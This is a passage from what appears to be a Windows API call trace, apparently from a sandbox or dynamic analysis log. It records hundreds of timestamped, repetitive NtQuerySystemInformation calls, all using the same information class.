ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda50, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd850, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfe0, Length=0x20, ResultLength=0x0) [0189.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x20, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf60, Length=0x20, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf10, Length=0x20, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd10, Length=0x20, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc0, Length=0x20, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.362] NtQuerySystemInformation 